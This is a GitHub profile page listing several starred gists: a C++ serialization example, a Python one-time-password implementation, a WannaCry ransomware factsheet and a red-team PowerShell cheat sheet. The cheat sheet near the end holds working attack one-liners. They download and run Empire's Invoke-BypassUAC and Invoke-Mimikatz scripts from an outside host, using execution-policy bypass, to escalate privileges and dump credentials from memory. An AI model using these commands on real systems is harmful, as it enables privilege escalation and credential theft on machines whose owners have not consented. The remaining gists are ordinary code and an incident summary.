Skip to content

Instantly share code, notes, and snippets.

View aa-tan's full-sized avatar
🔑
Coding for fun

Aaron Tan aa-tan

🔑
Coding for fun
31 followers · 20 following
View GitHub Profile
@codemonkey85
codemonkey85 / objSerialization.cpp
Last active November 26, 2022 04:26
An example of how to serialize / deserialize a C++ struct to and from a disk file.
struct OBJECT{ // The object to be serialized / deserialized
public:
// Members are serialized / deserialized in the order they are declared. Can use bitpacking as well.
DATATYPE member1;
DATATYPE member2;
DATATYPE member3;
DATATYPE member4;
};
void write(const std::string& file_name, OBJECT& data) // Writes the given OBJECT data to the given file name.
@bbolli
bbolli / hotp.py
Created August 21, 2014 13:36
HOTP/TOTP one time password (RFC 4226/RFC 6238) implementation
"""HOTP/TOTP one time password (RFC 4226/RFC 6238) implementation"""
import hashlib
import hmac
import struct
def hotp(secret, counter, digits=6, alg=hashlib.sha1):
"""Calculate the HOTP value for the given secret and counter.
@rain-1
rain-1 / Wannacrypt0r-FACTSHEET.md
Last active March 10, 2024 11:03 — forked from Epivalent/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@jivoi
jivoi / RedTeam_CheatSheet.ps1
Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands